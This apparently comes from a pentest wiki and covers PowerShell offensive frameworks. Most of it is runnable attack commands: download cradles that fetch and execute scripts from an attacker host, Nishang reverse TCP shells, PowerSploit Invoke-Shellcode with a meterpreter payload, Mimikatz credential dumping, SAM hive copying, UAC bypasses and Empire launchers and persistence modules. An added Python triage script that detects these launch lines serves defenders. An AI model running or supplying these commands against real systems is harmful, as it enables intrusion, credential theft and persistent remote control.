PowerShell frameworks

From pentestwiki.org

Intro

To check the version:

PS>$PSVersionTable.PSVersion


Powershell v1.0: Win XP SP2, 2003 Server SP1, Vista
Powershell v2.0: Win 7, Server 2008 R2
Powershell v3.0: Win 8, Server 2012
Powershell v4.0: Win 8.1, Server 2012 R2
Powershell v5.0: Win 10

Change default colors:

PS>$host.ui.RawUI.ForegroundColor = "black"
PS>$host.ui.RawUI.BackgroundColor = "white"
PS>clear



To compile a .ps1 into an .exe, use the PowerGUI Pro script editor.


  • List hotfixes
PS>Get-HotFix

Equivalent using wmic:

PS>wmic qfe list


  • Detect sandboxed environment
PS>Get-WmiObject Win32_BIOS | Format-List Name,SerialNumber


  • Handling Certificates

To list the certificates in the current user's and the local machine's stores:

PS>Get-ChildItem -Path "Cert:\CurrentUser\My"
PS>Get-ChildItem -Path "Cert:\LocalMachine"

Using GUI:

C:>certmgr.msc


To create a self-signed certificate:

PS>$cert = New-SelfSignedCertificate -CertStoreLocation Cert:\LocalMachine\My -DnsName testcert.example.org


  • Show system uptime
PS>Get-CimInstance -ClassName Win32_OperatingSystem | Select-Object CSName, LastBootUpTime


Scripts

Capturing a screenshot

# Saves a capture of the whole virtual desktop as a timestamped .bmp under -Path
Param(
    [Parameter(Mandatory = $true)][string]$Path
)
$FileName = "$env:COMPUTERNAME - $(Get-Date -Format yyyy-MM-dd_HHmmss).bmp"
$File = Join-Path $Path $FileName
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
# VirtualScreen spans all monitors; Left/Top may be negative with a secondary display
$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$Width = $Screen.Width
$Height = $Screen.Height
$Left = $Screen.Left
$Top = $Screen.Top
$bitmap = New-Object System.Drawing.Bitmap $Width, $Height
$graphic = [System.Drawing.Graphics]::FromImage($bitmap)
# Copy the screen region starting at (Left, Top) into the bitmap at (0, 0)
$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
$bitmap.Save($File)
$graphic.Dispose()
$bitmap.Dispose()
Write-Output "Screenshot saved to:"
Write-Output $File

Source: https://www.pdq.com/blog/capturing-screenshots-with-powershell-and-net/

Nishang

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.


In Kali: /usr/share/nishang

C:>powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Port-Scan.ps1'; Port-Scan -StartAddress 192.168.56.101 -EndAddress 192.168.56.105 -ResolveHost -ScanPort}"


C:>powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Remove-Update.ps1'; Remove-Update KB2534366}"


C:>powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1'; Invoke-CredentialsPhish}"


C:>powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Get-PassHashes.ps1'; Get-PassHashes}"


  • Fileless execution
C:>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/Check-VM.ps1'); Check-VM"


  • Does not work in Windows 7:
C:>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/winpost/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"


  • In Windows 7:
C:>powershell -ep bypass -command "(New-Object Net.WebClient).DownloadFile('http://$IP/winpost/Invoke-PowerShellTcp.ps1', 'Invoke-PowerShellTcp.ps1'); Import-Module .\Invoke-PowerShellTcp.ps1; Invoke-PowerShellTcp -IPAddress $LOCALIP -Reverse -Port 443"


Other useful modules:

  • Powerpreter
  • Out-CHM
  • Out-Word
  • Out-Excel
  • Out-HTA

Powersploit

C:>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"


PS>IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Recon/Invoke-ReverseDnsLookup.ps1"); Invoke-ReverseDnsLookup -IpRange $IP/24


PS>IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds


PS>IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-NinjaCopy.ps1"); Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "C:\Users\master\Desktop\SAM"


PowerUp

PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and escalation opportunities. It is part of PowerSploit and resides at https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc. Empire implements PowerUp’s escalation functionality in the privesc/powerup/* modules.

C:>powershell.exe -nop -exec bypass


PS>Import-Module .\PowerUp.ps1


PS>Invoke-AllChecks | Out-File -Encoding ASCII checks.txt


BypassUAC

PS>import-module .\bypass-uac.ps1


Does not work for Windows Server 2012:

PS>Bypass-UAC -Method UacMethodSysprep


Works for Windows Server 2012:

PS>Bypass-UAC -Method ucmDismMethod
PS>Bypass-UAC -Method UacMethodMMC2


More info:


Trojanize DLL

See also Msfvenom payloads

Trojanize Windows Service

PS>Write-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>] [-Credential <PSCredential>] [-Command <String>] [-Path <String>]


Source: https://powersploit.readthedocs.io/en/latest/Privesc/Write-ServiceBinary/

Empire

Empire is a PowerShell and Python post-exploitation agent.

Installation:

root #cd Empire/
root #./setup/install.sh


Usage:

root #./empire
(Empire) > listeners

(Empire: listeners) > uselistener http
(Empire: listeners/http) > execute
(Empire: listeners/http) > launcher powershell
powershell -noP -sta -w 1 -enc SQBmACgAJA<REDACTED>QB8AEkARQBYAA==

(Empire: listeners/http) >


Run the generated PowerShell launcher on the Windows target to open a session in Empire:

C:>powershell -noP -sta -w 1 -enc SQBmACgAJA<REDACTED>QB8AEkARQBYAA==

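The Nishang download cradles above and the Empire launcher line (powershell -noP -sta -w 1 -enc ...) are exactly what a defender sees in process-creation and PowerShell script-block logs, and the -enc argument is UTF-16LE text in base64 (which is why the launcher on this page starts with SQBmACgAJA, the encoding of "If($"). The following triage script is an added example, not code from this page, Nishang or Empire: it decodes the encoded command and flags the indicators these launch lines share; the command lines, the hidden script and the 203.0.113.10 address are constructed samples.

```python
import base64
import binascii
import re

# Indicators drawn from the launch lines on this page: -exec bypass, IEX with a
# Net.WebClient download cradle, and the Empire launcher's -noP -w 1 -enc flags.
INDICATORS = {
    "exec-policy-bypass": re.compile(r"-e(?:x\w*|p)\s+bypass", re.I),
    "download-cradle": re.compile(r"Net\.WebClient.*?Download(?:String|File)", re.I),
    "invoke-expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I),
    "no-profile": re.compile(r"-nop(?:rofile)?\b", re.I),
}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def triage(cmdline: str) -> dict:
    """Decode -enc if present and list every indicator found in the visible or decoded text."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [] if decoded is None else ["encoded-command"]
    hits += sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    return {"decoded": decoded, "indicators": hits}

def _enc(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed samples; 203.0.113.10 is a documentation address, not a real host.
HIDDEN_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage')"
SAMPLES = {
    "fileless": ("powershell.exe -exec bypass -Command \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://203.0.113.10/Check-VM.ps1'); Check-VM\""),
    "launcher": "powershell -noP -sta -w 1 -enc " + _enc(HIDDEN_SCRIPT),
    "benign": r"powershell.exe -File C:\Scripts\nightly-backup.ps1",
}

if __name__ == "__main__":
    for label, line in SAMPLES.items():
        print(label, triage(line))
```

Feed triage() the CommandLine field of Sysmon event 1 / Security 4688 records or the ScriptBlockText of PowerShell 4104 events; the decoded text is what to search for the URL and the staged script name.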

To handle agents in Empire:

$agents
$interact $AGENTID
$rename [old name] [new name]


Advanced modules:

$bypassuac http
$set Listener http
$run

or disk-less

$usemodule privesc/bypassuac_wscript


Credentials gathering:

$mimikatz


Persistence:

$usemodule persistence/elevated/schtasks


References:

WinEnum

A Powershell Privilege Escalation Enumeration Script